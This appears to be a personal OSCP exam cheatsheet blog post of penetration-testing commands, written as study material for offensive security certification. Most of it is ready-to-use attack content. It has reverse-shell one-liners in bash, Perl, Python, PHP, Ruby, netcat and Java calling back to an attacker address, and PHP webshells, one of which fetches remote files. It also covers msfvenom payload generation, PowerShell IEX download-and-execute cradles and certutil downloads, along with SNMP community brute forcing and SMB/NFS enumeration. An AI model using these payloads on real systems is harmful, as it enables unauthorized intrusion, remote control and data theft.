OSCP Cheatsheet

General Enumeration - Nmap

Replace $ip with target IP

Initial scan

1	nmap -Pn -n -vvv -oN nmap/initial $ip

If no ports are found, scan in parts

1	nmap -Pn -n -vvv -p1-500 -oN nmap/partial $ip

Scan all ports

1	nmap -Pn -n -vvv -p- -oN nmap/allports $ip

Targeted scanning

1	nmap -Pn -n -vvv -p22,80 -oN nmap/targeted $ip

UDP Scanning

1	sudo nmap -Pn -n -vvv -sU -oN nmap/udp $ip

Automated nmap scanning (my preference is nmapAutomator, never missed a port)

# It is recommended to scan ONE IP at a time
# Do NOT overload the network
# All scans, consecutively: Quick, Targeted, UDP, All ports, Vuln scan, CVE scan, Gobuster, Nikto
 nmapAutomator ip All

1
2
3

telnet ip port
nc -nv ip port
curl -iv $ip

Port 21 - FTP

Nmap script scanning - will reveal anonymous access

1	nmap -Pn -n -vvv -p21 -sC -sV $ip

Checking anonymous access manually

1
2
3

 ftp ip
ftp> USER anonymous
ftp> PASS anonymous

Easy view of FTP content - Browse to:

ftp://$ip

Uploading a binary or webshell

1 2	ftp> binary ftp> put file/name

Port 22 - SSH

Additional banner grabbing

1	ssh root@$ip

Port 53 - DNS

# Get nameservers and domain name of the IP address
nslookup
nslookup> server $target_ip
nslookup> $target
# o/p: ns1.example.com

# Get all sub-domains
host -l -a example.com $target_ip # or ns1.example.com

Port 79 - Finger

Run this script with following wordlist

1	/usr/share/metasploit-framework/data/wordlists/unix_users.txt

Port 80/443 - HTTP(S)

Get web server, version, potential OS

1	curl -i http://ip

Use Wappalyzer to identify technologies, web server, OS, database server deployed

View-Source of pages to find interesting comments, directories, technologies, web application being used, etc.

Finding hidden content
Scanning each sub-domain and interesting directory is a good idea

# Use small common wordlist first
# Use big wordlist next
# Use CMS specific wordlist if one is found
gobuster dir -u http://$ip -w /wordlist -o gobust.out
# Find technology specific content 
gobuster dir -u http://$ip -w /wordlist -o gobust_php.out -x php
# Find hidden notes, readme, changelog
gobuster dir -u http://$ip -w /wordlist -o gobust_txt.out -x txt

Files to browse manually

/robots.txt
/sitemap.xml
# Make it throw an error
/doesnotexist

Run web server scanning

1
2
3

# Identifies CMS
# Identifies Shellshock
nikto -host $ip -o nikto.txt

Web application specific scanning
WordPress, use API

1	wpscan --url http://$ip -e p,t,u --detection-mode aggressive > wpscan.log

Drupal, found here

1	droopescan scan drupal http://$ip -t 32

Port 110 - POP3

# Login
telnet $ip 110
USER test
PASS test

# List and view mails
# O/P: <mail_number> <mail_length>
list
# View mail
retr <mail_number>
quit

Port 139/445 - SMB

General enumeration

1 2	nmap -Pn -n -p139,445 --script smb-* $ip enum4linux -a $ip

Enumerate hostname

1	nmblookup -A $ip

Get version - script available here

1 2	./smbver.sh $ip [port] msf>use auxiliary/scanner/smb/smb_version

List shares
Note: smbmap will state access type available, smbclient will NOT. To check access type using smbclient, it’s best to access each share, read a file, and write a file.

smbmap -H $ip
# Get share items recursively
smbmap -H $ip -R <share>
smbmap -H $ip -d <domain> -u <user> -p <password>
smbclient -L \\$ip -N
# Protocol Error?
smbclient -L \\$ip -N --option='client min protocol=NT1'
smbclient -L \\$ip -U <user>

Connecting to a share

# Anonymously
smbclient //$ip/share -N
# Authenticated
smbclient //$ip/share -U <username>
# Protocol Error?
smbclient //$ip/share -N --option='client min protocol=NT1'

Port 161 - SNMP

MIB Values	Windows Parameters
1.3.6.1.2.1.25.1.6.0	System Processes
1.3.6.1.2.1.25.4.2.1.2	Running Programs
1.3.6.1.2.1.25.4.2.1.4	Processes Path
1.3.6.1.2.1.25.2.3.1.4	Storage Units
1.3.6.1.2.1.25.6.3.1.2	Software Name
1.3.6.1.4.1.77.1.2.25	User Accounts
1.3.6.1.2.1.6.13.1.3	TCP Local Ports

# Brute force community strings
# echo public > community
# echo private >> community
# echo manager >> community
# for ip in $(seq 1 254);do echo 10.11.1.$ip;done > snmp-ips
onesixtyone -c community -i snmp-ips

# Enumerate entire MIB tree
snmpwalk -c public -v1 $ip
# Enumerate specific MIB Value
snmpwalk -c public -v1 $ip $MIB_Value

snmp-check $ip

Port 2049 - NFS

# NFS < v4
# Enumerating shares available, and mount points
showmount -e $ip
showmount -a $ip

# Mounting, x = NFS Version
mount -t nfs -o vers=x $ip:<share> <local_dir>

# On target machine
# Find mount points on the target where SUID programs and scripts can be run from 
mount | grep 'nosuid\|noexec'

Shells / Payloads

Universal Listeners

# Netcat
[sudo] rlwrap nc -nvlp <port>

# msf multi/handler
msf(exploit/multi/handler)> set payload path/to/payload
msf(exploit/multi/handler)> set LHOST <ip> # or <interface>
msf(exploit/multi/handler)> set LPORT <port>

Linux

One-liners

Credit to Pentest Monkey

# bash
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/443 0>&1"

# Perl
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP
php -r '$sock=fsockopen("10.10.10.10",443);exec("/bin/sh -i &3 2>&3");'

# Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",443).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'

# Netcat : -u for UDP
nc [-u] 10.10.10.10 443 -e /bin/bash

# Netcat without -e : -u for UDP
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [-u] 10.10.10.10 443 > /tmp/f

# Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5/dev/tcp/10.10.10.10/443;cat &5 >&5; done"] as String[])
p.waitFor()

Reverse shell scripts

PHP reverse shell available here or locally
/usr/share/webshells/php/php-reverse-shell

Python PTY shells available here

Windows

PowerShell reverse shell available here
PHP reverse shell available here
Netcat for Windows available here

# PowerShell
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
vi shell.ps1
# go to end of file, paste the following
Invoke-PowerShellTcp -Reverse -IPAddress [attacker_ip] -Port [attacker_port]
# close, reverse shell ready to use

# Netcat - use x64 or x32 as per target. powershell.exe or cmd.exe
nc.exe x.x.x.x <port> -e powershell.exe

PHP Webshells

# Basic. system() or shell_exec() or exec()
<?php system($_GET['cmd']);?>

# More functional
<?php
$ip = 'http://10.10.14.4/' # [:port] . Change this
# Upload
if (isset($_GET['fupload'])) {
    file_put_contents($_GET['fupload'], file_get_contents($ip . $_GET['fupload']));
};
# Execute code
# shell_exec() or system() or exec()
if (isset($_GET['cmd'])) {
    echo "<pre>" . exec($_GET['cmd']) . "</pre>";
};
?>

Metasploit

System Binaries

# Linux reverse shell - Staged
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell
# Linux reverse shell - Stageless
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell

# Windows reverse shell - Staged
msfvenom -p windows/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe
# Windows reverse shell - Stageless
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe

Web

# PHP
msfvenom -p php/reverse_php 

# ASPX
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f aspx -o shell.aspx

# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw -o shell.jsp

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war -o shell.war

Shellcode

Select appropriate architecture

# Linux Staged - use python or c
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Linux Stageless - use python or c
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python

# Windows Staged - use python or c
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Windows Stageless - use python or c
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python

Upgrading your shell - Linux

Upon initial access, it is crucial to achieve the highest functional shell possible for privesc purposes!

# On victim machine
which python[3]
python[3] -c 'import pty;pty.spawn("/bin/bash")'
# background the listener using ctrl+z
stty -a # notice the number of rows and columns
stty raw -echo
# foreground the process: type fg, press enter
stty rows xx
stty columns xxx
export TERM=xterm-256color

Escaping jailed Shells

Go here

File Transfers

Server

# HTTP - Apache2
# cp file /var/www/html/file_name
sudo service apache2 start

# HTTP - Python. Default port 8000
# python2
sudo python -m SimpleHTTPServer 80
# python3
sudo python3 -m http.server 80

# SMB
sudo impacket-smbserver <share_name> <path/to/share>

# FTP
# apt-get install python-pyftpdlib
sudo python -m pyftpdlib -p 21

# TFTP (UDP)
sudo atftpd --daemon -port 69 /path/to/serve

# Netcat
nc -nvlp <port> < file/to/send

Linux - HTTP

# Wget
wget http://<ip>/file_name -O /path/to/save/file

# Netcat
nc -nv <ip> <port> > file/to/recv

# cURL
curl http://<ip>/file_name --output file_name

Windows

HTTP

# Does not save file on the system
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/<file_name>')"
# Saves file on the system
powershell.exe -nop -ep bypass -c "iwr -uri http://<ip>/<file_name> -outfile path/to/save/file_name"
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadFile('http://<ip>/<file_name>','path/to/save/file_name')"

certutil.exe -urlcache -split -f http://<ip>/file file_save

Wget.ps1

echo $storageDir = $pwd >> wget.ps1
$webclient = New-Object System.Net.WebClient >> wget.ps1
# Download file from
$url = "http://<ip>/file_name" >> wget.ps1
# Save file as
$file = "file_name"
echo $webclient.DownloadFile($url,$file) >>wget.ps1
# execute the script as follows
powershell.exe -nop -ep bypass -nol -noni -f wget.ps1

TFTP (UDP)
1
tftp -i <ip> get file_name

SMB

# cmd.exe
net use Z: \\<attacker_ip>\share_name
# To access the drive
Z:
# PowerShell
New-PSDrive -Name "notmalicious" -PSProvider "FileSystem" -Root "\\attacker_ip\share_name"
# To access the drive
notmalicious:

FTP

ftp <ip>
ftp>binary
ftp>get file_name

# One-liner downloader
# in cmd.exe do not use quotes in an echo command
echo open <ip> >> download.txt
echo anonymous >> download.txt
echo anon >> download.txt
echo binary >> download.txt
get file_name >> download.txt
bye >> download.txt
ftp -s:download.txt

Port Forwarding

Linux

Local port forwarding

1	ssh <gateway> -L <local_port_to_listen_to>:<remote_host>:<remote_port>

Remote port forwarding

1	ssh <gateway> -R <remote_port>:<local_host>:<local_port>

Dynamic port forwarding
1
ssh -D <local proxy port> -p <remote port> <target>
Windows
Chisel is a port forwarding tool for Linux as well as Windows, works over HTTP and can be found here.

# On KALI
./chisel server --reverse --port 9001
# On Windows
.\chisel.exe client KALI_IP:9001 R:KALI_PORT:127.0.0.1:WINDOWS_PORT

Privilege Escalation

Windows

Local enumeration + privilege escalation available here

Linux

Local enumeration + privilege escalation available here

Karan Bhayani

2020-06-25

#cheatsheet #oscp

OSCP

Web Exploitation

Active Directory

Write-ups

Misc

OSCP Cheatsheet

General Enumeration - Nmap

Banner Grabbing

Port 21 - FTP

Port 22 - SSH

Port 53 - DNS

Port 79 - Finger

Port 80/443 - HTTP(S)

Port 110 - POP3

Port 139/445 - SMB

Port 161 - SNMP

Port 2049 - NFS

Shells / Payloads

Universal Listeners

Linux

One-liners

Reverse shell scripts

Windows

PHP Webshells

Metasploit

System Binaries

Web

Shellcode

Upgrading your shell - Linux

Escaping jailed Shells

File Transfers

Server

Linux - HTTP

Windows

Port Forwarding

Linux

Windows

Privilege Escalation

Windows

Linux